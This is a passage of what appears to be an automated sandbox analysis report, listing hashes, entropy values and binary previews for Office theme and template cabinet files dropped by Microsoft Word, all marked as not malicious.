                            SSDEEP:768:+bjfeR1OOZvv439PlDe5/QzhgFSo0UEDmJwkqTA8Pi63Bsgn66w:IM3CN9ZzhFbUUwaP73BsB6w
                            MD5:DA3380458170E60CBEA72602FDD0D955
                            SHA1:1D059F8CFD69F193D363DA337C87136885018F0F
                            SHA-256:6F8FFB225F3B8C7ADE31A17A02F941FC534E4F7B5EE678B21CD9060282034701
                            SHA-512:17080110000C66DF2282FF4B8FD332467AF8CEFFA312C617E958FDFEBEE8EEA9E316201E8ABC8B30797BB6124A5CC7F649119A9C496316434B5AB23D2FBD5BB8
                            Malicious:false
                            Preview:MSCF....uk......L...........................uk...?...................j......r...............Equations.dotx.................Content.inf.94v..R..[..... .............v........." Vw.w..r.....D.V5.p...W......b;....\x.....f.-...............l.....L.F..*..@..BnF.I.....%1..0....&.X.......X-.\.\.>..A....@..:...N .G./.Sp.A0.0.`.....q....b... ......S.{K...V....J............>\....\.E.#.,$.hxu.F.Fo....<...{..6../..#..l>d...w...&...S.....L.].....^..L......;~l.......qw.o. .....v.u.W`.4Z.A.....dC..Q)9.c..qgtfJ..G.(.J....q4V.).mK4;..zY..b.5&....V...0X.].Z..U.Lx..^..:8XQh.....7yy.._5............c.W...c...xY..%..G.$....kg^.1g.9.....z^.'...q."..K)a[.pW .LS.:Q8.....2..._q.os....y...d11.*.m....8.,.^.4_?i.e.u.,....._y.....zZZA.D.D<..+....{....Sfnv...t.....0...vV..y.r..3..%.<.t......;.h.wh.-.g.>..5...R...........y..]^..R..<...>$~.'...kk.n..H.EN.eQ.Q.O./='....)t.l0,/].....FNN......?...&..'.eS....K.K.v".^L..x=.^......1x|....=}@...B.kq;_a..C.q?..Y9.v......Q..u.G..V.
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Cabinet archive data, many, 12767 bytes, 2 files, at 0x4c "ieee2006officeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                            Category:dropped
                            Size (bytes):28911
                            Entropy (8bit):7.7784119983764715
                            Encrypted:false
                            SSDEEP:384:WnJY165YD0tPYoCKa3HueqRyzVscLk1Yj2GjcgbA8E0GftpBjE2kWTpjFLrHRN7N:X4rtPzCK6uRoljXBA8Pi62ZphL0HRA5p
                            MD5:6D787B1E223DB6B91B69238062CCA872
                            SHA1:A02F3D847D1F8973E854B89D4558413EA2E349F7
                            SHA-256:DA2F261C3C82E229A097A9302C8580F014BB6442825DB47C008DA097CFCE0EE4
                            SHA-512:9856D88D5C63CD6EBCF26E5D7521F194FA6B6E7BF55DD2E0238457A1B760EB8FB0D573A6E85E819BF8E5BE596537E99BC8C2DCE7EC6E2809A43490CACCD44169
                            Malicious:false
                            Preview:MSCF.....1......L............................1...?...................0......"}..............ieee2006officeonline.xsl.:...............Content.inf.........[...G."...3$pE...G B....m3o[...I2&.f.,\..........}.n..{..e.8!^.3.A@...x..... .D.52gU..]..."..N8....s..CS..J3..HV...m...y..o....F.z......V.j._....=~k.....'.dY........1........#...d13.g.&C...C.xw.`f.hf..........]M....m.m....ud...,+.H~..cL...e#;(RI...eA....I.b...E...2..(...$.j...L...$..A....'[...H9..&..G.Q....".M.yl....]..?j%+....O~.*....|.se...K\.B"W..F.5.......=s...l.Y...K..yN.TBH[...sTWR.N.d...WEa....T.d.K.^sauI......m..s=.,qso5.b.V.s.]..9..,k4.\..L.;D...........;r.C...7.w.j..:N8.V6..a.3..j:A.mA..To..$.5....:./..p.x.3.=..__...8.EB.K.*..].-."..5-XU..J.....=o..K.Wavg.o].z.9.gk.._.........MZ.<.5............OY.n.o...r.9v.c.......[n.[..D...d..}.j.....LB,]_.9..St.@..C....\...^....-&.njq..!P....G^.....w.7.p~.......M..g.J............t1......q.w.rx...qp.....E.........-...2..G.........z.]B........d....C.@...@.
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Cabinet archive data, many, 26644 bytes, 2 files, at 0x4c "Element design set.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                            Category:dropped
                            Size (bytes):42788
                            Entropy (8bit):7.89307894056
                            Encrypted:false
                            SSDEEP:768:Hx+UzBiwDQTXgBm029ClGn4BZz6i5kIew/jG8Pi6lYJz1gH:0ZXc29eGn2n5klwjxP7l2z1gH
                            MD5:21A4B7B71631C2CCDA5FBBA63751F0D2
                            SHA1:DE65DC641D188062EF9385CC573B070AAA8BDD28
                            SHA-256:AE0C5A2C8377DBA613C576B1FF73F01AE8EF4A3A4A10B078B5752FB712B3776C
                            SHA-512:075A9E95C6EC7E358EA8942CF55EFB72AC797DEE1F1FFCD27AD60472ED38A76048D356638EF6EAC22106F94AFEE9D543B502D5E80B964471FA7419D288867D5D
                            Malicious:false
                            Preview:MSCF.....h......L............................h...?..................@g......o...............Element design set.dotx.................Content.inf.Y/..Re..[......f........,..]....D.],....]..X.......XC4pE.....p........2..u;L.N.....]G..d.^d.$).e.=..;..Kb.../.../....H.."...w$._I..5.....a..4.Gd5p......v.8..1..%H..\..e...3.e..A..).d*.. . (.8.".......(>..<...@...~*v&.f..LWhqk]+Uep.d..%...o.....k.......e...nNN.&_.>.d.?H`"...r?..Z.p..q..<M.N.t....{*.y]#...._XW"qI...x.......}.. .N...;.}:..m8...[.r.F....^?...o...u..*...J3.V....~...~tn#.Kf6.s.|*..,s...M.$.f..?Yu.pE.1_wU...%....._..'..Z......y:.{.J5..7..Q.w}/.~.-3~Ctw=..IT.....mI.u@...y.M....2.%...y...Y..j.k<-.Q.r...7m..b...+.6..|.....U..}[...,....^....5..D..qW...[3).p.Y<.Hh..t...%cw=Z..W.~W.F....zr.4.g...O...P.g_^..3.-............3s...S..y...u...N...EsJz....tT../..c[w{cG....../6.....:.W<d5}.q..s..K"$........Ne..5..#.v'..n4.rj....Fc=....5..VN.....6..9`....|..........WX..-?..........W.)^`1.......].R2..s6...H.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Cabinet archive data, many, 291188 bytes, 2 files, at 0x44 +A "Banded.thmx" +A "content.inf", flags 0x4, ID 56338, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                            Category:dropped
                            Size (bytes):307348
                            Entropy (8bit):7.996451393909308
                            Encrypted:true
                            SSDEEP:6144:7vH3uG+yiWx0eVJyORloyyDqnHefzOs81MrXLXx7:b36yiWH/LRS2CJl1
                            MD5:0EBC45AA0E67CC435D0745438371F948
                            SHA1:5584210C4A8B04F9C78F703734387391D6B5B347
                            SHA-256:3744BFA286CFCFF46E51E6A68823A23F55416CD6619156B5929FED1F7778F1C7
                            SHA-512:31761037C723C515C1A9A404E235FE0B412222CB239B86162D17763565D0CCB010397376FB9B61B38A6AEBDD5E6857FD8383045F924AF8A83F2C9B9AF6B81407
                            Malicious:false
                            Preview:MSCF....tq......D...........................tq.. ?..........|..................Mn. .Banded.thmx............Mn. .content.inf..;.u.i..[...............?....^.j.{j.B...$M/!...W....{!..^0x/.6...&............w......$.B..J.?a.$=...P..L...d..........+./.\..E:h.....-.$..u-.I..L\.M.r..Y..:rtX:....8...........+8.}{......&.-..f.f..s3-P.''.r...Z-"/E../...^%^N(,.$..$.H..O........q>...|.|......y..m.)u....`.....z.n..-.[.5....xL....M...O..3uCX..=4.....7.yh...dg.;..c.x.4..6..e..p.e"..,.!.St{..E..^I.9j....;..`.Y..#.0..f...G.....9~./....QCz.93..u%hz.........t9.""........)..7K.c~E!..x.E.p...[......o..O.j.c.......6.t{...".....t9V;xv....n<.F.S2.gI.#6...u..O..F.9.[.L.....K....#..zL..I...o....k...qog.......V..BKM..#.bET.)..&4..m.w...*....E.a[.Q.y.B...w...r.nd...)...<..#..r[4.y...#.z.....m?.2K.^...R{..m..f......r?]..>@...ra$...C+..l].9...."..rM9=......]".'...b&2e...y..a..4....ML..f...f"..l..&.Rv=2LL..4...3t_x...G....w..I.K....s.t.....).......{ur.y2...O3.K*f.*P(..F..-.y.Z...
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Cabinet archive data, many, 243642 bytes, 2 files, at 0x44 +A "content.inf" +A "Metropolitan.thmx", flags 0x4, ID 19054, number 1, extra bytes 20 in head, 24 datablocks, 0x1503 compression
                            Category:dropped
                            Size (bytes):261258
                            Entropy (8bit):7.99541965268665
                            Encrypted:true
                            SSDEEP:6144:9blShNYrHNn0JU+D+kh8CIjXHWC7X0nZLC9Ge2KY/WfI:9ZSTYrtn0Sk+CIDHWC7chVKYx
                            MD5:65828DC7BE8BA1CE61AD7142252ACC54
                            SHA1:538B186EAF960A076474A64F508B6C47B7699DD3
                            SHA-256:849E2E915AA61E2F831E54F337A745A5946467D539CCBD0214B4742F4E7E94FF
                            SHA-512:8C129F26F77B4E73BF02DE8F9A9F432BB7E632EE4ABAD560A331C2A12DA9EF5840D737BFC1CE24FDCBB7EF39F30F98A00DD17F42C51216F37D0D237145B8DE15
                            Malicious:false
                            Preview:MSCF............D...............nJ...............D.................."..........M. .content.inf....."......M. .Metropolitan.thmx...cVtP..[.....`Q..B.....=.T.....h.."...Z..|..}hZK.V....Z..Z................?..v...[S$."...H......^u.%.@...>....... f.........1.5......*&lm.tZ.msz:...Noc....1....D .........b..... ..3#pVp....}oo]{m......H*[%i.GNHB1D<......(*# ....H"....DP..b(B.<.....v......_..`.7..;.}............/.p}.:vp....~l0..].........S....G?.....}..U.;......dNi..?........-c..J.z....Z...._.O.....C..o.,......z....F....sOs$..w9......2G..:@...'....=.....M..am.....S......(`.._....'......[..K"....BD...D...^1k.....xi...Gt....{k@.W.....AZ+(,...+..o......I.+.....D..b. T.:..{..v.....g..........L.H.`...uU~C.d...{...4.N.N..m8..v.7..3.`.....,...W...s.;.fo.8.Y...2.i...T&.-...v8..v.U.Y=...8..F.hk..E.PlI.t.8......A.R....+.]lOei..2...... gS*.......%8H.....<.U.D..s.....>.....D_...../....l.......5O1S~.........B.g.++cV.z.f .R.Z.......@6....(..t^5"...#G...
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Cabinet archive data, many, 252241 bytes, 2 files, at 0x44 +A "content.inf" +A "Frame.thmx", flags 0x4, ID 34169, number 1, extra bytes 20 in head, 16 datablocks, 0x1503 compression
                            Category:dropped
                            Size (bytes):271273
                            Entropy (8bit):7.995547668305345
                            Encrypted:true
                            SSDEEP:6144:zfdvQnJMwXse4Vradf3mrC7woyWbjKlCVC7K:zfJwJse4VrS1AK
                            MD5:21437897C9B88AC2CB2BB2FEF922D191
                            SHA1:0CAD3D026AF2270013F67E43CB44F0568013162D
                            SHA-256:372572DCBAD590F64F5D18727757CBDF9366DDE90955C79A0FCC9F536DAB0384
                            SHA-512:A74DA3775C19A7AF4A689FA4D920E416AB9F40A8BDA82CCF651DDB3EACBC5E932A120ABF55F855474CEBED0B0082F45D091E211AAEA6460424BFD23C2A445CC7
                            Malicious:false
                            Preview:MSCF....Q.......D...............y...........Q...XJ..........{..................M.. .content.inf.(..........M.. .Frame.thmx.1....b..[.........B.....6....ZZ}....BH..-D..}..V.V-........Z..O.....H.f..........;..@d.`......!..=;.,bp..K.q....s.y....D.qZ)p......D...r.S....s=B.4.).8B....4.a6 ...~........."....#.....}....n.Q.1cH.%c/.U....E..E...!..Da*.p....X..G..:.....1.@.....W.'...._........W.c...<.v.k.....&.8......?.h.>d._:-.X.......9..tL}........3.;.N3.D~......>.^?..|:...}......oT.z.......w..[..}:...._fu........Kk.......L..9..p..e..^......K.%...Mapqhvv..E&.^.....[...9|"l...9...U......!..w..Nya...~C.yx...w.K..q.z.j.W?t.......DY.x.S2.....]..na.Qj...X.K..^...S.hK.W...Z....s.0...NF...8C.......j.'Zc...k.%...l....S.....OW..o.Qf.x...X.;<.rO].....W.m.e....T.1.6........".....Q.3........l..v.."..I...&......w..4vE...c.s[.3.m..8.q$.....a...)...&:6..,..#..?....;.!.....~.UP.r=.}h.&U......X...]..X.e\u.G<....E....lG.@.*Z...10.D@.]....z+-.S....p..Y.PK.:.S..p.....1E`..-
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Cabinet archive data, many, 279287 bytes, 2 files, at 0x44 +A "Basis.thmx" +A "content.inf", flags 0x4, ID 55632, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                            Category:dropped
                            Size (bytes):295527
                            Entropy (8bit):7.996203550147553
                            Encrypted:true
                            SSDEEP:6144:nwVaEqsf23c9shf6UyOGgDWDn/p3fd+zkPWnvGL3n9bQnkmVheyqtkl:MlPfW6sVEDn/pPdhWnvGL36zyyqal
                            MD5:9A07035EF802BF89F6ED254D0DB02AB0
                            SHA1:9A48C1962B5CF1EE37FEEC861A5B51CE11091E78
                            SHA-256:6CB03CEBAB2C28BF5318B13EEEE49FBED8DCEDAF771DE78126D1BFE9BD81C674
                            SHA-512:BE13D6D88C68FA16390B04130838D69CDB6169DC16AF0E198C905B22C25B345C541F8FCCD4690D88BE89383C19943B34EDC67793F5EB90A97CD6F6ECCB757F87
                            Malicious:false
                            Preview:MSCF.....B......D...............P............B..p?..........{.................M.. .Basis.thmx...........M.. .content.inf.`g..td..[...............5..$..WM.....R.......H\.+\./^...x.^..h..MU..\........v........+......g...$.......g.....~....U].7..T..1k.H...1...c.P.rp.6K..&......,.............U4.WoG.w.....;.....v..922.;]..5_-]..%E]b..5]... (..H..II..ttA4Q..BI!|...H.7J.2D....R.......CXhi`n....6..G.~&.[..N...v..Z"t.a..K..3..).w...._@.}.}.v.......4......h....R;.8.c&.F...B^....Q.....!Bm2...F.`.......M;...#.{....c...?...e...6t..C.-.E.V.v%I..H.....m.n...$D.....vU'.....=6}~...Gw...Y..?.@......G.....k......z...5d.h......1.}..O*;e..t......Y.0...3.v).X.-.2.....~....14.[.w=I....hN....eD..7G.u.z..7.do..!....d..o.wQ.:....@/.^..<e.-..=\.....6.C.'.rW$..Cp.M3.u6z......Q.F.9.5....juc..I...m4]7L....+n......).t......2[.3.p.:.....O5y..wA........^..!..H....{..S.3w.!&.'.;...(..|m.x.S..Z.j..3...n..WU...../w.......xe=.+.D...x..qy.S.....E..... ...uu.`.,..<.6[p
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Cabinet archive data, many, 259074 bytes, 2 files, at 0x44 +A "content.inf" +A "Dividend.thmx", flags 0x4, ID 58359, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                            Category:dropped
                            Size (bytes):276650
                            Entropy (8bit):7.995561338730199
                            Encrypted:true
                            SSDEEP:6144:H2a+HFkDF8gpmMt4kzwVVqhSYO6DITxPWgJl1CFExwXyo7N:mlZgFtIVVTuDExeWuv7N
                            MD5:84D8F3848E7424CBE3801F9570E05018
                            SHA1:71D7F2621DA8B295CE6885F8C7C81016D583C6B1
                            SHA-256:B4BC3CD34BD328AAF68289CC0ED4D5CF8167F1EE1D7BE20232ED4747FF96A80A
                            SHA-512:E27873BFD95E464CB58B3855F2DA404858B935530CF74C7F86FF8B3FC3086C2FAEA09FA479F0CA7B04D87595ED8C4D07D104426FF92DFB31BED405FA7A017DA8
                            Malicious:false
                            Preview:MSCF............D................................D..........~..................M. .content.inf............M. .Dividend.thmx..).}.b..[.....`.........?.R...T../..............4..yy....{...f.h..\U......sy.gV0Q.@..A..@..3a.A}........7.q.......8......R....sJ)E..ENr.S*B.1..).s.r.J.D.b."..........(.....E$.V........y.5.L....;gY..QK/nni..x..3.<..Q.Q..K.I.....T.z.,F.....{.p.....;8._.&../...........X...}.;[Gk..._.i`m.u.?...s.w...4.....m......l....5..n.?..c..m...,.....{.k.?......sC.............e..1....oL.8./......1._.K:.]..&......O............qo.....Dd/c...6.q.*......V.v........h....L..h..C+..V..;O.(7Z]{I%....S3.{h....\...b.......5.ES......Z.4...o.c`..YA....9i....M.s....Z3.oq`....>.i..@.@n.a...x.3.zp.<....vU/.|^CvE...aD.P&mhvM>.p..B~....."._.......v-.m..w..?._..=...:...k....i.}x.6....Y.i..n....h...j......LZ.....fk..f0.y.T..Vl.;...s.......B6.f.'z.c.\W?...4U)..aJ.;O....L.d7.J.V#Q.....\J.F.?].d}!..y].6..%..~....|......5...'N.#.....t6.,.E.O."..0fyz....
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Cabinet archive data, many, 206792 bytes, 2 files, at 0x44 +A "content.inf" +A "View.thmx", flags 0x4, ID 33885, number 1, extra bytes 20 in head, 15 datablocks, 0x1503 compression
                            Category:dropped
                            Size (bytes):222992
                            Entropy (8bit):7.994458910952451
                            Encrypted:true
                            SSDEEP:6144:k8/c2cF9GTLqsTmYstUdx+dwb2ooiVOfiI17zWbQ:jbzqGdpbZ/Mf3h68
                            MD5:26BEAB9CCEAFE4FBF0B7C0362681A9D2
                            SHA1:F63DD970040CA9F6CFCF5793FF7D4F1F4A69C601
                            SHA-256:217EC1B6E00A24583B166026DEC480D447FB564CF3BCA81984684648C272F767
                            SHA-512:2BBEA62360E21E179014045EE95C7B330A086014F582439903F960375CA7E9C0CF5C0D5BB24E94279362965CA9D6A37E6AAA6A7C5969FC1970F6C50876582BE1
                            Malicious:false
                            Preview:MSCF.....'......D...............]............'..H?..........z..................M{. .content.inf..l.........M{. .View.thmx......R..[...........@...G...I..(J.....B....Q!....}Ju..(BR..._|.5.%.....6m...........?.w{.rm,....#....;Ba#.:v...Dv.."u.v{!...f}......!......:.S.......".z.f.......==.n.0Km0eh.Kbm.C.r.6.........d..h.....{..w..}....2sb...rvm..x...0(..B... ...BH.r#.@..d".*..F+...Q.sx.....?...d.d.eZ2W2.2d...q.I....4.e4....#.....K...3...1.p.y......>.~V....cm....n^..b.{..._D?..AG...'...k.L&..h}=p.....Wl....(.......>.~.].....'.4.W{......../......7.....'.s...w...6..hn..e.2.).l]u.v4...GF.X..X..X....G.i.\..y.g&.<&ti......Sp,j.....>I..S..%.y..........S..-).+...>...D..............[...d...jt.~<x.a(.MDW..a..ZI.;+..!,.$...~>#...).R4...K.$.Zm......b...........{..._..A{.}..r...X...T.ZI.T.).J...$.".U,.9...r.z.)......}...()<....m....QS.p...;?..5.W~2r.EZu..P.1.%'l.........+/6.Mm.|2....Ty..f.o.S.....3J.._...X,..m....:..1.<GqFy.QA9W4.=....n...ZP...O.\.[...:8.%.^..H.....
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Cabinet archive data, many, 704319 bytes, 2 files, at 0x44 +A "content.inf" +A "Wood_Type.thmx", flags 0x4, ID 5778, number 1, extra bytes 20 in head, 51 datablocks, 0x1503 compression
                            Category:dropped
                            Size (bytes):723359
                            Entropy (8bit):7.997550445816903
                            Encrypted:true
                            SSDEEP:12288:NPnBZX7wR3tMwYqNDQGnXTtfzO5U7yo6O7bLhe8yE3LLDok4a:JBMbYE7xzO5U917bLh/DL3oJa
                            MD5:748A53C6BDD5CE97BD54A76C7A334286
                            SHA1:7DD9EEDB13AC187E375AD70F0622518662C61D9F
                            SHA-256:9AF92B1671772E8E781B58217DAB481F0AFBCF646DE36BC1BFFC7D411D14E351
                            SHA-512:EC8601D1A0DBD5D79C67AF2E90FAD44BBC0B890412842BF69065A2C7CB16C12B1C5FF594135C7B67B830779645801DA20C9BE8D629B6AD8A3BA656E0598F0540
                            Malicious:false
                            Preview:MSCF....?.......D...........................?...`J..............3..............M.. .content.inf..+.........M.. .Wood_Type.thmx......r..[.........................!.wwwwqwwwwwwwwwww..."....+......nR..x..\..w..r.5R.....(|.>.$e3.!..g....f..`9NL......o./.O.bxI...7.....|........6.n."J.....4^g.........?...................o.......s3.....8. .T.j...._.Z.Q.t.k,(o.c.t.......?Z....`o........?.a....6.)....6b..../.t...........Mz....q}......C.......+{.......o...K.tQjt............7.._....O.....\....` ..............@..`....%..t....V.]........m..m....u..1.yr;..t..F.'..+{....zqvd.g._..$H..Vl...m..../....g..rG.....:*......8....h...[...a06...U.W....5.Z.W..1I..#.2.....B3...x....$PRh...\{J.c.v.y..5+Y.W.N..hG......<..F..W.d8_....c...g....p|7.]..^.o.H.[$Zj..{4......m.KZ..n.T%...4.Z..Y."q7?kuB......U....).~.......W%..!.e.U.mp.o...h...?.w...T.s.YG#......Y.}....Z.O.i.r,...n..4.\....P..m..=....f........v....g....j...*.wP..4.VK.y.z...C..oum.b.1......?.Z.>.7.!?......A..Q>..Z....-
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Cabinet archive data, many, 533290 bytes, 2 files, at 0x44 +A "content.inf" +A "Parallax.thmx", flags 0x4, ID 64081, number 1, extra bytes 20 in head, 29 datablocks, 0x1503 compression
                            Category:dropped
                            Size (bytes):550906
                            Entropy (8bit):7.998289614787931
                            Encrypted:true
                            SSDEEP:12288:N4Ar9NyDhUQM0Hk86V1YnOIxQ9e6SJbj2OjK:jAG8wa5Qw6SZ2Oj
                            MD5:1C12315C862A745A647DAD546EB4267E
                            SHA1:B3FA11A511A634EEC92B051D04F8C1F0E84B3FD6
                            SHA-256:4E2E93EBAC4AD3F8690B020040D1AE3F8E7905AB7286FC25671E07AA0282CAC0
                            SHA-512:CA8916694D42BAC0AD38B453849958E524E9EED2343EBAA10DF7A8ACD13DF5977F91A4F2773F1E57900EF044CFA7AF8A94B3E2DCE734D7A467DBB192408BC240
                            Malicious:false
                            Preview:MSCF....*#......D...............Q...........*#...D..........~..................M{. .content.inf............M{. .Parallax.thmx.9... y..[......(..b.P...E.Q*.R.".RTH.%.T..F......u.{.*+.P.....FK*0].F...a{...D4`D..V.../.P,....2.Mx...u......0...E...{A-"J...)jl_.A..T......u.Y....ZG:....V.A.#~.. ..6..............o..X..<.... .......C.ce.f!nA.).p...p........n..................'6w6H6s.j....l...{?.h..........]..l.....v....%..l}A..................3...W_73.j......6...F.../..qG.?........H..).........7.&km....`m2..m.W.q.<../~<..6*.78..X~.e+..CC*w...T...6....AB..l..._.f......s.e....2....H..r.R.Z....a.,..\Q.q..._SJJ....7.S.R....=f..>....9=....NnC.....].-...\..Z..q..j...q.....Nj..^'..k...Zl.~PRvpz.J..+.C...k.z.w=l.#.............n...C..s.kM.@B{..vL.e....E..(/......f...g..=..V...}...).=s.....y!.,...X.[..[.....\31}..D%...%..+G66.j.v./.e9...P;.o.y..U+...g.g.S.../..B._L..h...Oi.._...:..5ls>>........n6.F.Q..v>..P.r:.a..Z....a...x..D....N...i..=L.u......<;Nv.X/*.
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Cabinet archive data, many, 1049713 bytes, 2 files, at 0x44 +A "content.inf" +A "Savon.thmx", flags 0x4, ID 60609, number 1, extra bytes 20 in head, 37 datablocks, 0x1503 compression
                            Category:dropped
                            Size (bytes):1065873
                            Entropy (8bit):7.998277814657051
                            Encrypted:true
                            SSDEEP:24576:qehtHA3nsAOx7yN7THwxdGpkw8R60aTcua5U4c:hhmnsBMNAxdGpV5za5Uv
                            MD5:E1101CCA6E3FEDB28B57AF4C41B50D37
                            SHA1:990421B1D858B756E6695B004B26CDCCAE478C23
                            SHA-256:69B2675E47917A9469F771D0C634BD62B2DFA0F5D4AF3FD7AFE9196BF889C19E
                            SHA-512:B1EDEA65B6D0705A298BFF85FC894A11C1F86B43FAC3C2149D0BD4A13EDCD744AF337957CBC21A33AB7A948C11EA9F389F3A896B6B1423A504E7028C71300C44
                            Malicious:false
                            Preview:MSCF....q.......D...........................q... ?..........{...%..............M. .content.inf.Q_.........M. .Savon.thmx...O>.o..[..............&.5....UUcC.C....A...`TU...F....".54.E.....g.-.7-D....1g...p.6......@..w(....h'?.....(..........p..J.2n$4.........A......?...........@.C.W.R.5X..:..*..I..?....r.y..~!.....!.A.a...!........O.........5.x<C...?.?....C.C.......'....F../....../.$................4.7...................P...(.w.}6.........7.....01.1r........._..?.............'.._..JOx.CFA<.........*0..2.?...>F.../...;..6-8..4...8&yb....".1%..v'..N...x......}.gYb..~L.....f[..!......Y.G.....p..r...?.p...F.Vy.....o.Whll...+...M.V...:.]...B.%.H....n..@.].zaVxf...y{.@....V.t.W....$Kp-.....7W.J..h..0A3mK.=.ub..R...W......*'T2..G#G,.^..T..XZu...U. ...76.d..#.I.JB.v...d...%.....6..O.K.[.:.L.\.....1.D..2a.>f......X...b5...ZgN.u.f...a!..."...sx....>..?.a.3.8.^._q..JS1.E..9..Lg.n.+....lE.f:j.9)Q..H1=..<.R.......{c>:.p[..S.9h.a.gL.U....8.z..z.!.....2I.~.b..2..c...
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Cabinet archive data, many, 214772 bytes, 2 files, at 0x44 +A "content.inf" +A "Parcel.thmx", flags 0x4, ID 26500, number 1, extra bytes 20 in head, 19 datablocks, 0x1503 compression
                            Category:dropped
                            Size (bytes):230916
                            Entropy (8bit):7.994759087207758
                            Encrypted:true
                            SSDEEP:6144:OTIPtMXmJWnzPS3pqnkeuJXW+FNx1a72rLiQxEBTR:750nz63/FJRFLISnp+Bt
                            MD5:93FA9F779520AB2D22AC4EA864B7BB34
                            SHA1:D1E9F53A0E012A89978A3C9DED73FB1D380A9D8A
                            SHA-256:6A3801C1D4CF0C19A990282D93AC16007F6CACB645F0E0684EF2EDAC02647833
                            SHA-512:AA91B4565C88E5DA0CF294DC4A2C91EAEB6D81DCA96069DB032412E1946212A13C3580F5C0143DD28B33F4849D2C2DF2214CE1E20598D634E78663D20F03C4E6
                            Malicious:false
                            Preview:MSCF.....F......D................g...........F...?..........|..................L.. .content.inf.zG.........L.. .Parcel.thmx.>2...R..[...0...........7....B+...BH....{...^.../.....B{...1....+".....<.....$........{.......sD"..j...}... P..w..U..f...6.x8. ...C..F.q.7....T.6p......B.P..L..g......A..43.W`.....{{...u.4...:.bb.4"X..m..)$..@(H. H.tBPTF..,.&.B.'...6..2...n..c%...Z@.(.@.......(.<i.i....P......?......o.......F.M.L......i.....C..7..../.....MQ.0..l.U.s.Fu.......1...p.;.(.}..ogd..<.._.Z......._.......O.J......97...~<...4.c....i..........'k.5.......Q.$..C..E... ..5.7....N.a.[ns6hi..kM....?....X......*9q...!O\....0....n.^s.9.6..............;. ..r...rf..C6z..v #.H...O...v/.sl....J.m%.L.Dp.e....*uO..g.y....f...].5.*........W.....h^[..w.|.=.ru.|.M..+.-.B...D.Ma....o.<X SnI....l...{..G..,..y5\W.@..y.;.y ...M..l.....e..A...d.e!.E..3.......k1.......6gY).../....pQ..?..s.W.)+R.S5..../.0..vz.^.......k.....v..9..A.NG...N~#..$.B...*s,(.o.@.ar.!.J.....
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Cabinet archive data, many, 682092 bytes, 2 files, at 0x44 +A "Berlin.thmx" +A "content.inf", flags 0x4, ID 46672, number 1, extra bytes 20 in head, 30 datablocks, 0x1503 compression
                            Category:dropped
                            Size (bytes):698244
                            Entropy (8bit):7.997838239368002
                            Encrypted:true
                            SSDEEP:12288:bUfKzAwwP7XAMWtr4FvMRt4lX0hnBdThiSb32+TdysrQgn7v4EemC6:sr7AMkJ34xu1bm4ZrQaY6
                            MD5:E29CE2663A56A1444EAA3732FFB82940
                            SHA1:767A14B51BE74D443B5A3FEFF4D870C61CB76501
                            SHA-256:3732EB6166945DB2BF792DA04199B5C4A0FB3C96621ECBFDEAF2EA1699BA88EE
                            SHA-512:6BC420F3A69E03D01A955570DC0656C83C9E842C99CF7B429122E612E1E54875C61063843D8A24DB7EC2035626F02DDABF6D84FC3902184C1EFF3583DBB4D3D8
                            Malicious:false
                            Preview:MSCF....lh......D...............P...........lh...?..........|..................M. .Berlin.thmx............M. .content.inf..lH.lj..[...............7.I..)........P..5x.B/^y5.xk^^......D.F........s....y...?D.....*.....&....".o..pl..Q.jm?_...6......=%.p.{.)S..y...$......,4..>#.........)..."-....K....4.E...L=.......4..p.c..nQ.0..ZO.#.....e.N..`U......oS....V..X[t.E)|.h..R....$..}.{.F.7....^.....w.,...5rBR.....{.......mi...h.b......w+..;.hV......q..(.7&.Z.l...C."j........[-E4h.....v&..~.p$|\X...8.....Fj'%,.)6w...u|C..,y..E..`*Up../(....2.(....Z.....,.'...d..s..Z....5.g.?Nq..04...f...D.x....q+.b.."v`{.NL....C..... ..n......1N+.I.{W9....2r.0...BaC.....O..=...k..."..8.D\jK.B...Aj....6,B..2...I.. B..^.4..1.K+.....DP...Mr....9..x[...>........?.Zd..'._2.._..>..'.F..#.w...2..~.|........q_Wy.W.....~..Qex.km/..f......t.q..p..gm.|.x.... ,.#\Z....p....a.}...%..v.J.Es......I.b.P?...0......F.x....E..j..6.%..E..-O.k...b .^.h.Cv...Z....D.n.d:.d.F..x...[1...B..
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Cabinet archive data, many, 624532 bytes, 2 files, at 0x44 +A "content.inf" +A "Quotable.thmx", flags 0x4, ID 13510, number 1, extra bytes 20 in head, 30 datablocks, 0x1503 compression
                            Category:dropped
                            Size (bytes):640684
                            Entropy (8bit):7.99860205353102
                            Encrypted:true
                            SSDEEP:12288:eV7ivfl+kbkIrWu+2aoRjwv/cSUWauGPo2v65s4QqcT3ZCCz6CSj8aC:fdhr1+3y4MWaC2CO4V+3ZCCDsO
                            MD5:F93364EEC6C4FFA5768DE545A2C34F07
